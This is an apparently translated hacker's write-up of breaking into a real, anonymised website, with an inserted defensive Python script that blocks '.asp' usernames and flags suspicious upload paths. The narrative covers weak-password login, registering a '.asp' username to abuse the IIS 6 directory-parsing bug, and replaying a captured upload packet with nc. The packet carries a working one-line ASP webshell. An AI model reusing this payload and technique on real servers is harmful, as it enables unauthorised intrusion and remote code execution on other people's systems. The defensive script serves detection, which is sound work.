This is a record of how I got a WEBSHELL by capturing and modifying an upload packet. After careful analysis, neither the main site nor the sub-sites had any injection vulnerability. Needless to say, this site uses MSSQL, so there was no ACCESS database to download, and I could not find the admin page either.
Then I registered a user and went in to take a look. There are three types of users to choose from at registration: ordinary members, instructor members and institutional members. The registration page tells you which permissions each role has. I registered all three once. Ordinary members and instructor members offered no possibilities; institutional members can upload training materials, but registration requires manual review, so I figured that was the end of it. I visited the site and then its forum, which runs DVBBS 8.0; whether it is on MSSQL or ACCESS I didn't know yet, but my feeling was ACCESS. The forum admin page was reachable, but the default database name had been changed, and login with the default admin account and password failed. The DVBBS 8.0 remote injection vulnerability failed as well. At this point I thought this site really was invincible for me. So I handed it to someone else to study, and unexpectedly, within 2 hours he had a WEBSHELL. Of course he didn't tell me how he got it, because we don't know each other. I thought: I'm not that weak, am I? How could someone else get in and I couldn't? What had I overlooked? I hurried to reflect... Analysing it over and over, I still thought the problem lay with institutional members, but registration goes through 2 to 4 hours of manual review, so he could not have gotten in within 2 hours that way... Observing a while longer, I made a small discovery: some pages have URLs in this format: http://www.xxxx.com/xxx/*/index.asp where * is some very irregular string, and careful analysis revealed that these strings are registered usernames! O(∩_∩)O haha~ Does that bring anything to mind? Let's set that aside for now.
From inside we also learned the names of some organisations that had already passed review, so we guessed there might be weak passwords, such as the password being the same as the username, or 123456, and so on.
After several tries I finally found one whose username and password were the same. After logging in, I found two places where files could be uploaded: the first changes the organisation's LOGO, the second uploads course-related pictures. The filter on the first is strict; testing the second showed that the upload function had already been removed, which I guess was done by the person who got in 2 hours earlier. So my only hope was the first one, with the stricter filter. I first uploaded a normal image file to see what came back. A successful upload returned a path like this: UploadImg/*/20081010201.jpg, where * is again the registered username! O(∩_∩)O haha~ Combined with the small discovery above, isn't that more interesting? We can register a username ending in “.asp” and then upload a picture; because of the IIS parsing BUG, every file under this .asp username directory is parsed and executed as ASP. But don't institutional registrations have to pass review? Don't we just have to wait? Well, I thought so at first too, but testing showed that as long as you register, the directory is created regardless of whether the account has been reviewed. Now the idea was clear; time to put it into practice. On the upload LOGO page, right-click to view source; searching for the action finds a value like this: uppic.asp?picurl=pic&file_ad=UploadImg/* where the * needs no further explanation from me. I changed the username in it to neeke.asp, completed the URL, saved the page as local HTML, then opened that local HTML page to upload an ASP backdoor with its extension changed to jpg. The upload result: failure! Maddening, isn't it? Is this the gap between theory and practice?
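As an added, defender-side example (not code from the original post): the two weaknesses described above are that a registered username becomes a directory name verbatim and that IIS 6 executes every file under a directory whose name ends in .asp. The Python below rejects such usernames at registration and flags request paths that contain a script-extension directory segment, run over constructed sample log lines; the extension list and the username rule are assumptions.

```python
import re
from urllib.parse import unquote

# Extensions that IIS 6 runs as script even when they appear in a *directory*
# name (the "name.asp/" parsing behaviour the write-up relies on). The list is
# an assumption for this example; tailor it to the server's script mappings.
SCRIPT_EXTS = (".asp", ".asa", ".cer", ".cdx")

# Conservative allow-list for usernames that become directory names (assumed).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")

def username_is_safe(name: str) -> bool:
    """Reject any username that cannot serve as a plain directory name.
    Dots are disallowed outright, so 'neeke.asp' and 'x.asp;.jpg' both fail."""
    return USERNAME_RE.fullmatch(name) is not None

def path_has_script_dir(path: str) -> bool:
    """True if any directory segment (not the final file name) ends with a
    script extension, e.g. /UploadImg/neeke.asp/20081010201.jpg.
    The query string is dropped and percent-encoding decoded first."""
    segments = unquote(path.split("?", 1)[0]).split("/")
    return any(seg.lower().endswith(SCRIPT_EXTS) for seg in segments[:-1])

# Constructed sample log lines (method, URI, status); not real server data.
SAMPLE_LOG = """\
GET /xxx/alice/index.asp 200
POST /upload/uppic.asp?picurl=pic&file_ad=UploadImg/alice 200
GET /UploadImg/neeke.asp/20081010201.jpg 200
GET /UploadImg/bob/20081010202.jpg 200
GET /UploadImg/neeke%2Easp/yjh.jpg 200
"""

def flag_suspicious_requests(log_text: str) -> list:
    """Return the URIs whose directory path contains a script-extension segment."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and path_has_script_dir(parts[1]):
            hits.append(parts[1])
    return hits

if __name__ == "__main__":
    for uri in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", uri)
```

The request to `uppic.asp` itself is not flagged because the script name is the final segment, not a directory; only paths with a `.asp` directory component match.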
Now to today's topic. I don't know why it failed, but there was a surprise in it. I uploaded again, this time without the local html above, and opened WSockExpert to capture the packet.
The captured packet is as follows:
The following is the quoted fragment:

```http
POST /upload/uppic.asp?picurl=pic&file_ad=UploadImg/* HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xxxxx.com/xxxx/upload/uppic.asp?picurl=pic&file_ad=UploadImg/*
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d89c6100702
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.xxxxx.com
Content-Length: 356
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCBQDTRD=CBDAOFCDOKNKAFBGOJIELFBL; StatUserID=; geturl=%2Fbbs%2Findex%2Easp%3Fboardid%3D19; upNum=0; cck_lasttime=1227791151328; cck_count=0; cnzz_a723913=148; vw=%3A21294148%3A56594595%3A24657327%3A74573309%3A50974716%3A50987662%3A37122531%3A67808458%3A70586579%3A70604138%3A28852802%3A47119284%3A76191357%3A37126954%3A51284925%3A52364933%3A38661202%3A74790164%3A70610751%3A72013662%3A73415389%3A76191358%3A49587472%3A43119978%3A-251370864%3A73388968%3A70611921%3A73384211%3A32870242%3A37063863%3A32420673%3A53783557%3A72013663%3A65003880%3A70588081%3A66406723%3A57972621%3A73406321%3A60801952%3A40826249%3A39695629%3A49578341%3A59386483%3A41111789%3A25224022%3A69210191%3A53796330%3A38456400%3A62172134%3A29259370%3A36499102%3A46949182%3A32361261%3A31862738%3A79674658%3A34731608%3A102446092%3A36507283%3A81784150%3A86027646%3A81809181%3A74781075%3A72012436%3A80383143%3A83227606%3A76186399%3A81784130%3A77581333%3A73399009%3A78982247%3A73385225%3A78982193%3A88833998%3A87432179%3A74816111%3A; sin=-1; rtime=2; ltime=1227806311218; cnzz_eid=67318861-1227622346-; tab=4; Dvbbs=; ystat_bc_809970=28764444891124193035; ystat_ss_809970=26_1227833988_1259315693

-----------------------------7d89c6100702
Content-Disposition: form-data; name="FileName"; filename="D:\WEBSHELL\yjh.jpg"
Content-Type: text/plain

<% On Error Resume Next execute request("a") %>
-----------------------------7d89c6100702
Content-Disposition: form-data; name="Submit"

Upload a screenshot
-----------------------------7d89c6100702--
```
In the packet above, change the * to neeke.asp and save it as a txt file in the same directory as nc; the file name is arbitrary, here neeke.txt. Next open a DOS prompt, go to the directory where nc is, and enter `nc -vv www.xxxxx.com 80 < neeke.txt`. Wait a few seconds and it returns the result of the submission. The result of this submission is shown in the figure below.
OK, got it! Hey hey~~ It seems I have to analyse more carefully beforehand! No matter how awesome your technique, without a good mind you are still a dumb ox.